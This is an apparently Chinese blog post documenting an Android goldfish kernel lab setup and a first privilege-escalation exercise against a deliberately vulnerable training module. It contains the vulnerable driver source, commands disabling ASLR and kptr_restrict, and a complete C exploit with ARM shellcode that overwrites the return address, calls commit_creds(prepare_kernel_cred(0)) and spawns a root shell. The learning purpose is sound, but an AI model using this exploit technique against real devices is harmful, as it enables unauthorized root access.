linux 解压安卓kernel,android kernel | 环境搭建 + 第一次尝试

搭建环境过于艰辛,做个记录....

环境搭建

内核代码下载

git clone https://aosp.tuna.tsinghua.edu.cn/kernel/goldfish.git

漏洞项目代码下载

git clone https://github.com/Fuzion24/AndroidKernelExploitationPlayground.git kernel_exploit_challenges

内核编译 和 准备工作:

准备 | 将 漏洞模块 编译进内核

cd goldfish && git checkout -t origin/android-goldfish-3.4 &&

git am --signoff < ../kernel_exploit_challenges/kernel_build/debug_symbols_and_challenges.patch &&

cd .. && ln -s $(pwd)/kernel_exploit_challenges/ goldfish/drivers/vulnerabilities

准备编译工具

下载 arm-linux-androideabi-4.6.tar.bz2

tar xvf arm-linux-androideabi-4.6.tar.bz2

export PATH=

math?formula=(pwd)%2Farm-linux-androideabi-4.6%2Fbin%2F%3APATH | 推荐将指令加入 〜/ .bashrc 一劳永逸

编译指令(在 goldfish 目录下)

make goldfish_armv7_defconfig && make -j8

安卓环境准备

解压 : tar xvf android-sdk_r24.4.1-linux.tgz

加入环境变量 : export PATH=/home/haclh/hacktools/android-sdk-linux/tools:$PATH

下载jdk

新开一个 shell , 运行 android (需要在加入环境变量步骤后使用)

下载下图中指定的jdk

a81e1dc52a1c

image.png

下载后通过 android list targets 指令可以查看所有下载的 镜像文件

a81e1dc52a1c

image.png

创建模拟器

android create avd --force -t "android-19" -n kernel_challenges

使用内核运行模拟器

emulator -show-kernel -kernel arch/arm/boot/zImage -avd kernel_challenges -no-boot-anim -no-skin -no-audio -no-window -qemu -monitor unix:/tmp/qemuSocket,server,nowait -s

android 动态调试 (goldfish 目录下运行如下指令)

arm-linux-androideabi-gdb vmlinux

第一次尝试 | 内核栈溢出提权

首先看看漏洞代码, kernel_exploit_challenges / challenge / stack_buffer_overflow / module / stack_buffer_overflow.c :

#include

#include

#include

#include

#include

#include

#define MAX_LENGTH 64

MODULE_LICENSE("GPL");

MODULE_AUTHOR("Ryan Welton");

MODULE_DESCRIPTION("Stack Buffer Overflow Example");

static struct proc_dir_entry *stack_buffer_proc_entry;

int proc_entry_write(struct file *file, const char __user *ubuf, unsigned long count, void *data)

{

char buf[MAX_LENGTH];

if (copy_from_user(&buf, ubuf, count)) {

printk(KERN_INFO "stackBufferProcEntry: error copying data from userspacen");

return -EFAULT;

}

return count;

}

static int __init stack_buffer_proc_init(void)

{

stack_buffer_proc_entry = create_proc_entry("stack_buffer_overflow", 0666, NULL);

stack_buffer_proc_entry->write_proc = proc_entry_write;

printk(KERN_INFO "created /proc/stack_buffer_overflown");

return 0;

}

static void __exit stack_buffer_proc_exit(void)

{

if (stack_buffer_proc_entry) {

remove_proc_entry("stack_buffer_overflow", stack_buffer_proc_entry);

}

printk(KERN_INFO "vuln_stack_proc_entry removedn");

}

module_init(stack_buffer_proc_init);

module_exit(stack_buffer_proc_exit);

相关知识点

提权基础

用户态 | 内核态 区别 (EL1 | EL0 权限等级)

提权思路 : 利用 EL1 权限下可以执行的 EL0 级别的操作中的漏洞 , 在EL0 级别的操作过程中做到命令执行 , 提升用户等级 , 并反弹shell , 从而做到普通用户到 root 的提权 | 描述方式需要修改。。。

驱动编程 | 在这次利用过程中必要的知识

注册驱动 | module_init , open 时调用

stack_buffer_proc_entry->write_proc | 当对这个设备写入时 , 会调用 write_proc 对应的函数

copy_from_user(&buf,ubuf,count) 从用户空间拷贝数据到buf

回到用户态:

下面就是要回到用户态,在x86平台有iret指令可以回到用户态,在arm下返回用户态就更简单了。在arm下cpsr寄存器的M [4: 0]位用来表示处理器的运行模式,具体可以看这个。所以我们把cpsr寄存器的M [4:0]位设置为10000后就表示处理器进入了用户模式。

漏洞点 :

proc_entry_write 没有对输入长度或字符内容做限制,造成栈溢出

这次可能遇到的相关缓解措施 及其缓解手段

ASLR

堆栈地址随机化 , 意味着shellcode地址需要动态调整

关闭方式 : echo 0 > proc/sys/kernel/randomize_va_space

kptr_restrict

内核层 的 pie | 动态加载 内核符号

/proc/kallsyms文件中保存着所有的内核符号的名称和它在内存中的位置

关闭方式 : echo 0 > proc/sys/kernel/kptr_restrict

相关作用 : 获取 commit_creds 和 prepare_kernel_cred 符号的地址,用来提权时使用

具体的利用思路:

- 1.调用 commit_creds(prepare_kernel_cred(0)) 提升权限

- 2.调用 mov r3,#0x40000010; MSR CPSR_c,R3; 设置 cpsr 寄存器, 使cpu进入用户模式

- 3.然后执行 execl(“/ system / bin / sh”,“sh”,NULL); 起一个 root 权限的 shell

EXP:

#include

#include

#include

#include

#include

#define MAX 68

int open_file(void)

{

int fd = open("/proc/stack_buffer_overflow", O_RDWR);

if (fd == -1)

err(1, "open");

return fd;

}

void payload(void)

{

printf("[+] enjoy the shelln");

execl("/system/bin/sh", "sh", NULL);

}

extern uint32_t shellCode[];

asm

(

" .text\n"

" .align 2\n"

" .code 32\n"

" .globl shellCode\n\t"

"shellCode:\n\t"

// commit_creds(prepare_kernel_cred(0));

// -> get root

"LDR R3, =0xc0039d34\n\t" //prepare_kernel_cred addr

"MOV R0, #0\n\t"

"BLX R3\n\t"

"LDR R3, =0xc0039834\n\t" //commit_creds addr

"BLX R3\n\t"

"mov r3, #0x40000010\n\t"

"MSR CPSR_c,R3\n\t"

"LDR R3, =0x826d\n\t" // payload function addr

"BLX R3\n\t"

);

void trigger_vuln(int fd)

{

#define MAX_PAYLOAD (MAX + 4)

char buf[MAX_PAYLOAD];

memset(buf, 'A', sizeof(buf));

void * pc = buf + MAX;

*(void **)pc = (void *) shellCode; //ret addr

/* Kaboom! */

write(fd, buf, MAX_PAYLOAD );

}

int main(void)

{

int fd;

printf("shellcdoe addr: %p\n", shellCode);

printf("payload:%p\n", payload);

fd = open_file();

trigger_vuln(fd);

close(fd);

}

tip :在本地测试会遇到的坑点

本次测试的漏洞时 栈溢出 , 可能在本地环境偏移不同

payload 加载地址变化

Illegal instruction | 非法指令 , 此报错执行exp 未进入内核态的操作.

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值